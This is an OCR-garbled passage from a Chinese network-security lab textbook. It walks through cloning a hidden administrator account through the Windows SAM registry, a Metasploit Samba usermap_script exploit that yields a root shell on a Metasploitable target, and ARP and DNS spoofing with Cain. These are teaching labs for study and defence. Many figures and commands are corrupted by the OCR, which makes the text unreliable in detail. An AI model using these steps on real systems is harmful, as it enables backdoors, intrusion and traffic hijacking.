就 对 应 账户 名 Administrator 的 内 容 。 再 如 ,本 实验 中 的 Tuser, 类 型 为 0x3f2, 于 是 
\Domains\ Account\ User 中 的 000003F2 就 对 应 着 账户 名 Tuser 的 内 容 , 以 此 类 推 。 

值得 注意 的 是 ,默认 情况 下 ,管理 员 无 法 直接 访问 SAM 数据 库 ,如果 要 查看 SAM 数据 
库 , 需 要 使 用 Regedt32 来 修改 访问 权限 。 本 实验 中 的 SAM 也 必须 赋予 完全 控制 权限 。 具 
体操 作 过 程 为 : 在 注册 表 编 辑 器 中 右 击 SAM 文件 夹 下 的 SAM 子 文件 夹 , 在 出 现 的 快捷 菜 
单 中 选择 “权限 ”命令 ,在 打开 的 “SAM 的 权限 ”对 话 框 中 选择 Administrator JH F! ,在 权限 列 
表 中 将 “完全 控制 "设置 为 “允许 ” 即 可 ,如 图 2-70 所 示 。 














@srsım 


Adainistrators 的 权限 (P) 


ER 








图 2-70 为 SAM 赋予 完全 控制 权限 


4. 复制 项 

前 文 提 到 ,在 \Domains\Account\User 目录 下 存放 着 各 种 账号 的 信息 ,其 中 每 个 账号 
下 面 有 两 个 子 项 : 下 项 和 V 项 。 

V 项 中 保存 的 是 账户 的 基本 资料 ,包括 用 户 名 、 用 户 全 称 (full name) .所属 组 、 描 述 、 密 
码 Hash、 注 释 、 是 否 可 以 更 改 密码 、 账 户 启用 密码 设置 时 间 等 。 

F 项 中 保存 的 是 一 些 登录 记录 ,包括 上 次 登录 时 间 、 错 误 登 录 次 数 等 ,还 有 一 个 重要 
的 一 一 这 个 账号 的 SID 相对 标识 符 。 

因此 ,要 创建 一 个 具有 管理 员 权限 的 隐藏 账户 ,就 必须 复制 Administrator 用 户 的 下 项 
内 容 到 某 一 账户 。 例 如 ,要 将 Administrator 用 户 的 F 项 内 容 复制 给 Tuser, 具 体 做 法 是 : 
选取 User 文件 夹 下 000003F2 子 文件 夹 ( 上 一 节 已 经 进行 了 介绍 ,这 个 子 文件 夹 对 应 于 
Names 文件 夹 下 的 Tuser 子 文件 夹 ) 的 下 项 ,将 Administrator 的 下 项 内 容 复 制 给 Tuser Hl 
可 ,如 图 2-71 所 示 。 
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2-71 复制 F 项 中 的 内 容 





注销 Administrator 用 户 , 以 用 户 Tuser 的 身份 重新 登录 操作 系统 。 在 命令 提示 符 窗口 
中 通过 “whoami /user” 命 令 查 看 用 户 Tuser 的 SID, 会 发 现 该 用 户 的 SID 由 1000 变 成 了 
500, 具 有 了 管理 员 权 限 ,如 人 72 所 示 , 至 此 用 户 Tuser 与 管理 员 用 户 Administrator 的 
FE. 


icrosoft Windovs [RÆ 5.2.3790) 
kc» ARILENA 1985-2003 Microsoft Corp. 














:NDocuments and Settings Vidninistrator2whoami /user 


SID 


Isd -f bau59hnu4kc sadninistrator S-1-S-21-3416811936-3707106819-2955160413-S00 


1NDocuments and Settings idninistrator?, 





图 2-72 Tuser 的 SID 55 Administrator 的 SID 值 完 全 一 样 
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至 此 可 以 看 出 ,本 实验 之 所 以 可 以 克隆 一 个 具有 管理 员 权 限 的 用 户 , 是 因为 SID 的 相 
对 标识 符 RID 在 注册 表 中 的 一 个 账号 中 出 现 了 两 次 ,一 个 是 在 子 键 000001F4 中 , 另 一 个 就 
在 F 项 的 内 容 中 ,从 48 到 51 的 4 字 节 : F4010000, 这 实际 上 是 一 个 长 类 型 变量 ,也 就 是 
000001F4。 当 一 个 标识 出 现在 两 个 地 方 时 就 将 发 生 同 步 问 题 。 显 然 , 微 软 公司 在 这 个 问题 
上 犯 了 一 个 错误 ,两 个 变量 本 应 该 统一 标识 为 一 个 用 户 账 号 ,但 是 微软 公司 在 设计 
Windows 操作 系统 时 将 两 个 变量 分 别 发 挥 各 自 的 作用 , 却 没有 通过 同步 方式 统一 起 来 , 因 
此 在 Windows 登录 时 ,将 从 SAM 中 获得 相对 标识 符 , 而 这 个 相对 标识 符 的 位 置 是 F 值 中 
的 F4010000。 但 是 ,账户 信息 查询 却 是 使 用 SAM 中 Names 子 键 的 内 容 。 

需要 指出 的 是 ,针对 SAM 数据 的 修改 是 具有 危险 性 的 ,如 果 不 能 正确 地 修改 将 使 
SAM 文件 遭 到 破坏 ,造成 系统 无 法 启动 或 启动 后 无 法 正常 工作 等 问题 。 


2.7.4 ESE 


在 本 实验 的 基础 上 ,读者 可 以 继续 学 习 Windows 的 登录 及 身份 认证 过 程 。 

Windows Server 必须 确定 自己 是 否 在 与 合法 的 安全 主体 ( 即 合法 的 用 户 ) 进 行 交互 ,这 
是 通过 认证 实现 的 ,其 中 最 简单 的 例子 就 是 用 户 的 登录 及 身份 认证 过 程 。 一 个 完整 的 
Windows 登录 过 程 要 经 过 以 下 4 个 步骤 。 

CD 用 户 按 Ctrl 十 Alt 十 Del 组 合 键 ,引起 的 硬件 中 断 被 系统 捕获 后 ,使 操作 系统 激活 
WinLogon 进程 (这 是 一 个 登录 进程 )。WinLogon 进程 通过 调用 标识 与 鉴别 dll, 将 登录 窗 
口 (账号 名 和 口令 登录 提示 符 ) 展 示 在 用 户 面 前 ,要 求 用 户 输入 一 个 用 户 名 和 密码 。 

(2) WinLogon 将 用 户 名 和 密码 传递 给 本 地 安全 认证 (Local Security Authority, 
LSA). 

(3) LSA 查询 安全 账号 管理 器 (Security Account Manager,SAM) 数 据 库 , 以 确定 用 户 
名 和 密码 是 否 属于 授权 的 系统 用 户 。 如 果 用 户 名 和 密码 合法 ,SAM 把 该 用 户 的 SID 及 该 
用 户 所 属 组 的 SID 返回 给 LSA。LSA 使 用 这 些 信 息 创建 一 个 访问 令 牌 (Access Token) ,每 
当 用 户 请 求 访问 一 个 受 保护 资源 时 ,LSA 就 会 将 访问 令 牌 显示 出 来 以 代替 用 户 的 “标记 ”。 

(4) WinLogon 进程 传送 访问 令 牌 到 Win32 模块 ,同时 发 出 一 个 请 求 ,以 便 为 用 户 建立 
登录 进程 。 登 录 进 程 建立 用 户 环境 ,包括 启动 Desktop Explorer 和 背景 等 。 

随 着 微软 公司 对 安全 越 来 越 重 视 , 对 Windows 操作 系统 的 启动 及 用 户 登 录 认 证 过 程 也 
做 了 大 量 的 改进 ,读者 可 以 查阅 具体 Windows 版 本 的 启动 和 登录 认证 资料 ,并 通过 相关 实 





2.8 利用 samba 漏洞 进行 渗透 


漏洞 是 系统 设计 和 开发 过 程 中 存在 的 缺陷 ,补丁 则 是 针对 已 发 现 漏洞 的 修补 程序 ,漏洞 
在 发 现 后 未 被 修复 就 可 能 会 被 攻击 者 利用 。 


2.8.1 预备 知识 : 了 解 Windows 系统 漏洞 
Windows 系统 漏洞 即 Windows 操作 系统 本 身 存在 的 技术 缺陷 。 漏 洞 的 存在 严重 威胁 
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着 Windows 系统 的 安全 ,漏洞 的 发 现 和 利用 成 为 网 络 攻防 学 习 的 重点 。 


通过 对 漏洞 的 利用 ,攻击 者 可 以 实现 本 地 权限 的 提升 和 远程 代码 的 执行 等 操作 。 利 用 
远程 执行 代码 的 漏洞 ,攻击 者 可 以 通过 网 络 发 起 远程 攻击 直接 获取 目标 主机 的 访问 权 并 进 
入 系统 。 然 后 ,攻击 者 再 利用 本 地 权限 提升 型 漏洞 ,将 获得 的 受 限 用 户 权限 提升 到 管理 员 权 























限 ,进而 获得 目标 主机 的 完整 控制 权 。 


漏洞 是 指 在 一 个 信息 系统 的 硬件 软件 或 固件 的 需求 .设计 、 实 现 、 配 置 \ 运 行 等 过 程 中 








有 意 留 下 或 无 意 中 产 生 的 一 个 或 若干 个 缺陷, 它 会 导致 该 信息 系统 处 于 


掘 是 指 采用 一 定 的 信息 技术 方法 去 发 现 ` 分 析 和 利用 信息 系统 中 漏洞 的 


2.8.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,读者 重点 掌握 以 下 内 容 。 
(1) 了 解 Metasploitable 系统 的 漏洞 。 
(2) 学 习 使 用 Metasploit 工具 。 
2. 实验 条 件 
本 实验 所 需要 的 软 硬 件 清单 如 表 2-1 所 示 。 

表 2-1 利用 samba 漏洞 进行 渗透 实验 清单 





F 风险 之 中 。 漏 洞 控 





























类 = к 号 软 硬 件 要 求 я № 
1 数量 16 
攻击 机 2 操作 系统 版 本 Kali Linux 
3 软件 版 本 Samba 3. 0.0—4. 0. 7 
1 数量 16 
ШЕ 2 操作 系统 版 本 Ubuntu 操作 系统 
3 软件 版 本 Metasploit v4. 0 


2.8.3 实验 过 程 





步骤 1: 打开 靶 机 ,正常 登录 系统 。 然 后 使 用 "ifconfig” 命 令 查看 靶 机 的 IP 地 址 ,如 图 2-73 


所 示 。 


sfadnin&netasploitable:^$ 


$ 
sfadmin@metasploitable:”$ 


Link encap:Ethernet M 
i [72 T6. 1. 35 ] 


UP BRÜRDC. RUNN ING 
RX packets:38658 errors:0 dropped:O overrur 
4 errors:0 dropped:0 overruns:O carrier: 
txqueuelen:1990 
9.0 B) TX butes:0 (0.0 B) 
:0xc000 Memoru:feba0000-febc0000 





В 2-73 查看 靶 机 的 IP 地 址 


需要 说 明 的 是 ,如 果 靶 机 的 ІР 地 址 是 通过 配置 DHCP 服务 器 自动 获取 的 ,每 次 查看 随 


机 的 IP 地 址 时 ,其 值 可 能 不 同 。 在 实验 中 建议 使 用 静态 IP 地 址 。 


80 











步骤 2: 打开 攻击 后 使 用 ifconfig” 命令 查看 其 IP 地 


址 ,如 图 2-74 所 示 。 


1eff: faa4; 62c4/64 Scope: Link 
UP BROADCAST RUNNING MULTICAST MTU: 4500; Metric: 1 
RX packets: 195939 errors: 0 dropped: 0 over ruñs; Ü гате: 0 
TX packets:3213 errors: 0 dropped: 0 overruns: 0 càfhier: 0 
collisions: 0 txqueuelen: 1000 
RX bytes: 12193274 (11.6 MiB) TX bytes: 554421 (541. 4: Ki8) 


Link епсар: Local Loopback 

inet адаг; 127. 0. 0.1 Mask: 255.0.0.0 
inet6 addr: : : 1/128 Scope: Host 

UP LOOPBACK RUNNING MTU:65536 Меїгїс:1 





图 2-74 查看 攻击 机 的 IP 地 址 
步骤 3: 运行 Metasploit 下 的 “msfconsole” 命 令 , 如 图 2-75 所 示 。 


root@nilk: -# [rs Teonsote] 


# у++ 


Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro -- learn more on http: //.rapid7. com/ metasploit 


=[ metasploit v4.9.3-2014071601 [core:4.9 api: 1.0] ] 





2-75 ”运行 Metasploit Т ff ^ msfconsole" $5 4 
步骤 4. 搜索 samba 漏洞 利用 插件 ,可 输入 “search samba” 命 令 , 如 图 2-76 所 示 。 


msf >| ѕеагсһ ѕатб, 


Matching Modules 


Name Disclosure 
escription 


auxitiary/ admin/ smb/ samba_ wii 
amba Symlink Directory TraverdaA M 7 
auxiliary/dos/samba/lsa, 2 heap 


amba lsa io privilege set Heàp Ovérfiow 
auxiliary/dos/samba/lsa transnames heap 





图 2-76 ”搜索 samba 漏洞 利用 插件 





步骤 5: 通过 “use exploit/multi/samba/usermap. script" йб JII Ж 


件 , 如 图 2-77 Brzn o 


同 利 用 插 


samba ij 





msf > use exploit/multi/samba/Usermaáp, script 





图 2-77 加 载 samba 漏洞 利用 插件 
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步骤 6: 输入 “info" 命 令 ,查看 samba 模块 信息 ,如 图 2- 


msf exploit(Usermap_script) »[inTo ] 


8 所 示 。 


Name: Samba "username map sēript" Command Executiðn 
Module: exploit/multi/samba/usermap_script 
Platform: Unix 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 


I 
Provided by: 
jduck <jduck@netasploit. com> 


Available targets: RH MINURI 


Id Name 


0 Automatic 





图 2-78 ”查看 samba 模块 信息 





步骤 7: 输入 “show options” 命 令 ,查看 需要 设置 的 参数 ,如 


msf exploit( иѕегтар_ѕсгірї) >| 


Module options (exploit/multi/samba/usermap, script): 


Name Current Setting Required Descriptibn 


RHOST target address 
RPORT 139 target port 


Езра заго С) ПОС 


Id Мате 


0 Automatic 





图 2-79 查看 需要 设置 的 参数 





步骤 8: "set rhost” 命 令 设置 靶 机 的 IP 地 址 ,如 图 2-80 所 示 


script) 





2-80 设置 靶 机 的 IP 地 址 





步骤 9: 输入 "exploit” 命 令 ,对 靶 机 执行 溢出 操作 ,如 图 2-81 所 示 





exploit(usermap_script) >[ехртотт ] 


Started reverse double handler 

Accepted the first client connection... 
Accepted the second client connection... 
Command: echo sFl55sVJErT7tAIm; 

Writing to Socket А 

Writing to socket B 


Reading from sockets... 
Reading from socket B 

B: "*sFl55sVJErT7tAImArxn" 

e ПОГА 
А is input... 


Command shell session 1 opened ( 172. 16. 1. 29: 4444 - > 172.16.1.35:34114) at 20| 


15- 01- 09 04: 52: 01 -0500 1 





В 2-81 对 靶 机 执行 溢出 操作 
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步骤 10: 输入 ”whoami" 命 令 , 显 示 登 录 名 (为 攻击 机 使 用 的 用 户 账 户 名 root) ,如 图 2-82 


所 示 。 
whoami 
root 


图 2-82 显示 登录 名 


2.8.4 任务 与 思 

-个 完整 的 漏洞 扫描 器 一 般 由 以 下 几 部 分 组 成 。 

1. 漏洞 数据 库 

漏洞 数据 库 包 括 漏洞 的 具体 信息 漏洞 扫描 评估 脚本 、 安 全 漏洞 危害 评分 等 信息 ,该 漏 
洞 数 据 库 会 在 新 的 漏洞 被 公布 后 及 时 更 新 。 漏 洞 数据 库 一 般 需 要 与 CVE 保持 兼容 。 

2. 扫描 引擎 模块 

扫描 引擎 模块 是 漏洞 扫描 器 的 核心 部 件 , 它 一 般 提供 了 一 个 可 供用 户 操作 的 控制 台 。 
通过 控制 台 , 用 户 可 以 定义 被 扫描 对 象 并 设置 相关 参数 ,对 被 扫描 对 象 发 送 扫描 用 探测 数据 
包 , 并 从 接收 到 的 被 扫描 对 象 返回 的 应 答 数据 包 中 提取 漏洞 信息 ,然后 与 漏洞 数据 库 中 的 漏 
洞 特征 进行 比 对 ,以 判断 目标 对 象 是 否 存在 漏洞 。 一 般 的 扫描 器 同时 提供 了 主机 扫描 、 端 口 
扫描 、 操 作 系统 扫描 和 网 络 服务 探测 等 功能 。 

з. 用 户 控制 台 

用 户 控制 台 用 于 对 扫描 对 象 和 方式 进行 设置 ,如 要 扫描 的 目标 主机 及 要 检测 的 具体 漏 
洞 等 。 

4. 扫描 进程 控制 模块 

扫描 进程 控制 模块 用 于 监控 扫描 进程 的 任务 进展 情况 ,并 将 当前 扫描 的 进度 和 结果 信 
息 通过 用 户 控制 台 展 示 给 用 户 。 

5. 结果 存储 与 报告 生成 模块 

结果 存储 与 报告 生成 模块 利用 漏洞 扫描 得 到 的 结果 自动 生成 扫描 报告 ,并 告知 用 户 在 
哪些 目标 系统 上 发 现 了 哪些 安全 漏洞 。 





2.9 ARP 和 DNS 欺骗 攻击 的 实现 
2.9.1 预备 知识 : ARP 和 DNS 欺骗 原理 


1. ARP 欺骗 

ARP(Address Resolution Protocol, 地 址 解析 协议 ) 欺 骗 是 攻击 者 常用 的 网 络 攻击 手 
段 之 一 。ARP 协议 涉及 TCP/IP 体系 结构 中 网 络 层 的 IP 地 址 和 数据 链 路 层 的 MAC 地 
址 , 即 根据 IP 地 址 来 查询 对 应 的 MAC 地 址 。 对 于 具体 的 网 络 节点 来 说 ,其 IP 地 址 和 
MAC 地 址 之 间 存 在 一 一 对 应 关系 。ARP 欺骗 的 实质 就 是 破坏 IP 地 址 与 MAC 地 址 之 间 
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的 一 一 对 应 关系 ,将 虚假 的 对 应 关系 提供 给 其 他 节点 ,使 被 欺骗 节点 将 数据 错误 地 发 送 
给 欺骗 节点 。 

ARP 欺骗 的 类 型 较 多 ,最 典型 的 是 伪造 网 关 。 网 关 是 一 个 网 络 (一 般 为 一 个 IP 网 段 或 
一 个 局 域 网 ) 向 外 部 发 送 并 从 外 部 接收 数据 的 节点 ,对 于 网 络 中 的 主机 来 说 ,如 果 指 定 的 网 
关 有 错 , 将 无 法 正常 与 外 部 进行 通信 。 读 者 可 以 利用 身边 的 计算 机 做 一 个 简单 的 实验 ， 
将 一 台 能 够 正常 连接 互联 网 的 计算 机 的 “默认 网 关 ” 的 ТР 地 址 修改 为 其 他 任意 一 个 IP 3h 
址 ,就 会 发 现 这 台 计 算 机 无 法 正常 接 入 互联 网 了 。 这 一 个 简单 的 实验 充分 说 明了 网 关 的 
重要 性 。 

每 个 网 络 节点 都 维护 着 一 张 ARP 表 , 该 表 中 临时 保存 着 所 有 与 该 节点 建立 通信 关系 
的 其 他 节点 的 IP 地 址 和 MAC 地 址 的 映射 关系 。ARP 表 的 建立 一 般 有 主动 解析 和 被 动 请 
求 两 个 途径 。 

CD 主动 解析 。 如 果 一 台 计 算 机 希望 与 男 外 一 台 不 知道 МАС 地 址 (但 知道 IP 地 址 ) 的 
计算 机 通信 , 则 该 计算 机 主动 发 送 一 个 ARP 请 求 报 文 , 当 对 方 接收 到 该 ARP 请 求 报 文 后 ， 
就 会 向 请 求 者 返回 一 个 ARP 应 答 报 文 , 通 过 该 应 答 报 文 将 自己 的 MAC 地 址 告诉 给 请 求 
者 。 请 求 者 在 接收 到 应 答 报 文 后 ,就 会 将 对 方 的 IP 地 址 及 MAC 地 址 的 映射 关系 保存 在 自 
己 的 ARP 表 中 。 主 动 解析 实现 的 前 提 是 两 台 计 算 机 必须 位 于 同一 个 IP 子 网 中 。 

(2) 被 动 请 求 。 如 果 一 台 计 算 机 接收 到 了 另 一 台 计 算 机 的 ARP 应 答 ( 广 播报 文 后 ,不 
管 是 否 需要 与 该 计算 机 进行 通信 ,都 会 将 该 ARP 应 答 报 文中 计算 机 的 IP 地 址 和 MAC 地 
址 映射 关系 保存 在 自己 的 ARP 表 中 。 

在 掌握 了 有 关 ARP 协议 的 工作 原理 后 ,下 面 通过 一 个 具体 的 例子 来 介绍 АЕР 欺骗 的 
实现 过 程 。 

假设 有 3 台 计 算 机 A、B.C, 其 中 B 已 经 正确 建立 了 A 和 C 计 算 机 的 ARP 表 项 。 假 设 
A 是 攻击 者 ,此 时 A 发 出 一 个 ARP 应 答 报 文 ,该 ARP 应 答 报 文 的 构造 为 : IP 地 址 是 C 的 
IP 地 址 ,MAC 地 址 是 A 的 MAC 地 址 。 

这 样 ,计算 机 B 在 收 到 这 个 ARP 应 答 报 文 (ARP 应 答 报 文 是 一 个 广播 报 文 , 同 一 网 络 
上 所 有 计算 机 都 能 收 到 ) 时 ,发 现 自己 的 ARP 表 中 已 经 存在 计算 机 C 的 IP 地 址 和 MAC 地 
址 的 映射 ,但 MAC 地 址 与 收 到 的 应 答 报 文中 的 MAC 地 址 不 一 致 ,于 是 根据 ARP 协议 , 计 
算 机 В 将 使 用 ARP 应 答 报 文中 的 MAC 地 址 (其 实 是 计算 机 C 的 MAC 地 址 ) 更 新 自己 的 
ARP 表 。 

通过 以 上 过 程 ,计算 机 B 的 ARP 缓存 中 就 存在 了 错误 ARP 表 项 : 计算 机 C 的 IP 地 址 
与 计算 机 A 的 MAC 地 址 对 应 。 这 样 的 结果 是 ,计算 机 В 发 给 C 的 数据 都 被 计算 机 A 接收 
到 ,从 而 实现 了 ARP 欺骗 。 

2. DNS 欺骗 

DNS(Domain Name System, 域 名 系统 ) 的 作用 是 在 用 户 访 问 互 联网 时 将 从 浏览 器 的 地 
址 栏 中 输入 的 域名 (如 www. sina. com. cn) 解 析 为 对 应 的 IP 地 址 (如 202. 102. 94.124)。 对 
于 任何 一 台 接 人 互联 网 的 主机 来 说 ,在 DNS 的 缓存 还 没有 过 期 之 前 ,如 果 在 DNS 的 缓存 中 
已 经 存在 的 记录 ,一 旦 有 客户 端 查询 ,DNS 服务 器 将 会 直接 返回 缓存 中 的 记录 。 和 否则 ,DNS 
将 进行 递归 查询 。 

下 面 通过 一 个 具体 例子 来 介绍 DNS 欺骗 的 实施 过 程 。 
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一 台 运 行 着 UNIX 系统 的 Internet 主机 ,在 该 主机 上 提供 了 rlogin( 远 程 登 录 ) 服 务 ,该 
主机 的 IP 地 址 为 123. 45. 67. 89 ,使 用 的 DNS 服务 器 ( 即 /etc/resolv. conf 中 指向 的 DNS 服 
务 器 ) 的 IP 地 址 为 98. 76. 54. 32。 某 个 客户 端 (IP 地 址 为 38. 222. 74. 2) 试 图 连接 到 UNIX 
主机 的 rlogin 端口 ,假设 UNIX 主机 的 /etc/hosts. equiv 文件 中 使 用 的 是 DNS 名 称 来 允许 
目标 主机 的 访问 ,那么 UNIX 即 会 向 IP 为 98.76. 54. 32 的 DNS 服务 器 发 出 一 个 PTR( 反 
向 解析 ?记录 的 查询 。 


123.45.67.89 -> 98.76.54.32 [Query] 
МОҮ: 1 NAN: 0 NNS: 0 NAD: 0 
QY: 2.74.222.38. in- addr. arpa PTR 


IP 地 址 为 98. 76. 54. 32 的 DNS 服务 器 中 没有 这 个 反 向 查询 域 的 信息 ,经 过 一 番 查 询 ， 
这 个 DNS 服务 器 找到 38. 222. 74. 2 和 38. 222. 74. 10 为 74. 222. 38. in-addr. arpa. 的 权威 
DNS 服务 器 ,所 以 它 会 向 38. 222. 74. 2 发 出 PTR 查询 。 


98.76.54.32 -> 38.222.74.2 [Query] 
NQY: 1 NAN: 0 NNS: 0 NAD: 0 
QY: 2.74.222.38. in- addr. агра PTR 


需要 注意 的 是 ,38. 222. 74. 2 正 是 本 例 中 客户 端的 IP 地 址 ,也 就 是 说 这 人 台 主 机 是 完全 
掌握 在 攻击 者 手中 的 。 攻 击 者 可 以 更 改 它 的 DNS 记录 ,让 它 返回 所 需要 的 结果 。 


38.222.74.2 -> 98.76.54.32 [Answer] 

NQY: 1 NAN: 2 NNS: 2 NAD: 2 

QY: 2.74.222.38. in- addr. агра PTR 

AN: 2.74. 222.38. in- addr. arpa PTR trusted. host. com 
AN: trusted. host. соп A 38. 222. 74.2 

NS: 74. 222. 38. in- addr. arpa NS ns. sventech. com 

NS: 74. 222. 38. іп ~ addr. arpa NS п51. sventech. com 
AD: ns. sventech. com A 38. 222. 74. 2 

AD: п51. sventech. соп A 38.222.74.10 


当 IP 地 址 为 98. 76. 54. 32 的 DNS 服务 器 收 到 这 个 应 答 报 文 后 ,会 把 结果 转发 给 IP 地 
址 为 123. 45. 67. 98 的 主机 , 即 本 例 中 那 台 提供 rlogin 服务 的 UNIX 主机 (攻击 目标 ) ,并 且 
IP 地 址 为 98.76. 54. 32 的 DNS 服务 器 会 把 这 次 的 查询 结果 保存 在 自己 的 缓存 中 , 供 下 次 
查询 时 使 用 。 

这 时 ,UNIX 主机 就 认为 IP 地 址 为 38. 222. 74. 2 的 主机 名 为 需要 解析 的 域名 (假设 该 
域名 为 trusted. host. com) ,然后 UNIX 主机 查询 本 地 的 /etc/hosts. equiv 文件 ,看 这 台 主 机 
是 否 被 允许 使 用 rlogin 服务 。 很 显然 ,攻击 者 的 欺骗 目的 达到 了 。 


2.9.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,读者 重点 掌握 以 下 知识 。 
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COD 常见 的 ARP 欺骗 和 DNS 欺骗 原理 及 实现 过 程 。 

(2) 结合 具体 应 用 ,分 析 ARP 欺骗 和 DNS 欺骗 产生 的 原因 。 

(3) ARP 欺骗 和 DNS 欺骗 的 防范 方法 。 

2. 实验 条 件 

本 实验 在 一 台 运 行 Windows Server 2003 及 以 上 版 本 的 服务 器 上 进行 。 在 开始 实验 之 
前 ,还 需要 安装 和 配置 Cain 和 Sniffer( 或 Wireshark) 软 件 。 

其 中 ,Cain 是 一 款 可 以 明文 形式 捕获 远程 控制 命令 或 密码 的 工具 ,支持 多 种 远程 控制 
或 远程 传输 协议 ,提供 的 主要 功能 包括 管理 远程 系统 的 路 由 表 、 显 示 远 程 系统 上 本 地 端口 的 
状态 、 转 存 远程 系统 上 的 LSA(Local Security Authority, 本 地 安全 机 构 ) 的 内 容 、. 从 SAM Ж 
件 中 读 取 NT 的 口令 散 列 值 等 。 

Sniffer 是 一 种 典型 的 监视 网 络 状态 .数据 流动 情况 及 网 络 上 传输 信息 的 工具 ,也 是 网 
络 攻 防 中 使 用 的 必 备 工具 。 


2.9.3 实验 过 程 


步骤 1: 在 Windows 服务 器 上 安装 Cain 或 Sniffer 等 软件 ,本 实验 中 使 用 的 是 Cain 
工具 。 
步 又 2: 运行 Cain 软件 ,打开 如 图 2-83 所 示 的 操作 窗口 。 


E File Vie Configure Tools Help 


еШ л mms ri 





|a € e dum | 












Cached Passwords 
Protected Storage 
LSA Secrets 

D wireless Passwords 
IET Passwords 
Windows Mail Passwords 
Dialup Passwords 

fe Edit Boxes 

Enterprise Manager 

Credential Manager 















Fress the + button on the toolbar to dunp the Protected Storagi| 


http://www. oxid. it 了 
图 2-83 Саш 软件 操作 窗口 


步骤 3: 选择 Configure 选项 ,在 打开 的 如 图 2-84 所 示 对 话 框 中 对 进行 欺骗 的 IP 地 址 
和 MAC 地 址 进行 配置 。 在 本 实验 中 ,192. 168. 0. 233 为 伪造 的 IP 地 址 。 

步骤 4: TE Filters and ports 选项 卡 中 ,选择 需要 进行 嗅 探 的 协议 ,如 图 2-85 所 示 。 如 
果 要 对 邮件 收发 进行 嗅 探 ,就 需要 同时 选中 POP3.SMTP.IMAP 复 选 框 。 

步骤 5: 选择 功能 栏 中 的 嗅 探 器 Sniffer, 青 选取 主机 Hosts。 在 扫描 前 需要 先 激活 嗅 探 
ЗСА H də 图标) ,如 图 2-86 所 示 。 

步骤 6: 在 图 2-86 中 的 操作 界面 的 空白 处 右 击 :在 出 现 的 快捷 菜单 中 选择 Scan MAC 
Addresses 选项 ,如 图 2-87 所 示 , 即 开始 对 MAC 地 址 进行 扫描 。 扫 描 结果 如 图 2-88 所 示 。 
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В 2-86 激活 嗅 探 器 


步骤 7: 单 击 操作 界面 下 方 的 区 到 到 图 标 , 再 单 击 上 方 的 国 图 标 ,将 打开 如 图 2-89 所 
示 的 New ARP Poison Routing 对 话 框 ,在 对 话 框 的 左 侧 列表 中 选取 局 域 网 的 网 关 , 在 对 话 
框 的 右 侧 列表 中 选取 被 欺骗 的 IP 地 址 。 在 本 实验 中 ,172. 17. 135. 2 为 网 关 ,172. 17. 135. 6 
为 被 欺骗 地 址 。 

步骤 8: 展开 APR 选项 ,如 图 2-90 所 示 , 选 取 APR-DNS 选项 。 然 后 再 单 击 上 方 的 围 
图 标 ,在 打开 的 如 图 2-91 所 示 的 对 话 框 中 配置 DNS 欺骗 的 域名 和 IP 地 址 。 在 本 实验 中 ， 
将 www. baidu. com 的 访问 欺骗 到 IP 地 址 为 211. 71. 233. 40 的 主机 上 。 

步骤 9: 开始 ARP 欺骗 。 这 时 ,在 被 欺骗 主机 (IP 地 址 为 172. 17. 135. 6) 的 浏览 器 地 址 
栏 中 输入 http://www. baidu. com, 打开 的 却 不 是 百度 公司 网 站 的 首页 ,而 是 IP 地 址 为 
211.71.233. 40 的 主机 (为 某 一 单位 网 络 教学 综合 平台 ,如 图 2-92 所 示 ) 页 面 ,欺骗 成 功 。 
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图 2-87 选择 Scan MAC Addresses 进行 扫描 


| Super Micro Computer, Inc. | 








图 2-88 显示 扫描 结果 




















图 2-89 选择 网 关 和 被 欺骗 地 址 
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图 2-90 APR 选项 图 2-91 配置 DNS 欺骗 的 域名 和 IP 地 址 
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图 2-92 ”欺骗 成 功 后 的 显示 页 面 


2.9.4 任务 与 思 

本 实验 是 一 个 综合 性 实验 ,主要 针对 计算 机 网 络 中 影响 较 大 的 两 类 欺骗 方式 : ARP JK 
骗 和 DNS 欺骗 。 这 两 类 欺骗 攻击 能 够 得 以 实现 ,主要 是 基于 ARP 和 DNS 协议 存在 的 缺 
陷 。 由 于 在 网 络 发 展 的 早期 ,在 具体 设计 一 些 协议 时 ,还 没有 考虑 到 类 似 于 今天 的 应 用 ,应 
用 的 局 限 性 导致 了 安全 隐患 的 存在 。 这 种 现象 不 仅仅 出 现在 ARP 和 DNS 两 个 协议 中 , 几 
乎 TCP/IP 体系 中 涉及 的 主要 协议 都 存在 不 同 范围 和 程度 的 安全 问题 。 

在 完成 了 本 实验 后 ,请 读者 结合 计算 机 网 络 知识 ,深入 分 析 存 在 ARP 欺骗 和 DNS 欺骗 
的 主要 原因 ,并 在 此 基础 上 ,学 习 防范 ARP 欺骗 和 DNS 欺骗 的 主要 方法 。 
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“一 切 皆 文件 ?是 Linux 的 基本 思想 ,包括 命令 .硬件 和 软件 设备 .进程 等 ,对 于 操作 系统 
内 核 而 言 都 被 视 为 拥有 各 自 特 性 或 类 型 的 文件 。Linux 是 一 款 免 费 的 操作 系统 ,用 户 可 以 
通过 网 络 或 其 他 途径 免费 获取 ,并 可 以 任意 修改 其 源 代码 。 正 是 由 于 “一 切 皆 文件 ”和 开源 
这 两 大 特点 ,来 自 全 世界 的 无 数 程序 员 参 与 了 Linux 的 修改 、 编 写 工 作 , 程 序 员 可 以 根据 自 
己 的 兴趣 和 灵感 对 其 进行 修改 和 完善 ,这 让 Linux 吸收 了 无 数 程序 员 的 智慧 ,在 发 展 中 不 断 
壮大 ,已 成 为 目前 在 服务 器 应 用 领域 占用 率 最 高 的 操作 系统 ,也 被 互联 网 资源 的 提供 者 视 为 
最 安全 可 靠 的 操作 系统 。 不 过 ， 安 全 ”这 一 概念 在 互联 网 应 用 中 是 相对 的 , 即 在 互联 网 中 不 存 
在 绝对 的 安全 ,各 类 攻击 行为 在 Linux 系统 中 仍然 存在 ,只 是 攻击 的 方式 和 难度 不 同 而 已 。 








3.1 Linux 基本 命令 的 使 用 


3.1.1 预备 知识 : Linux 的 字符 终端 


Linux 系统 的 字符 终端 窗口 为 用 户 提供 了 一 个 标准 的 命令 行 接口 ,在 字符 终端 窗口 中 ， 
会 显示 一 个 Shell 提示 符 ,通常 为 "$”。 用 户 可 以 在 提示 符 后 输入 带 有 选项 和 参数 的 字符 
命令 ,并 能 够 在 终端 窗口 中 看 到 命令 的 运行 结果 ,此 后 ,将 会 出 现 一 个 新 的 提示 符 ,标志 着 新 
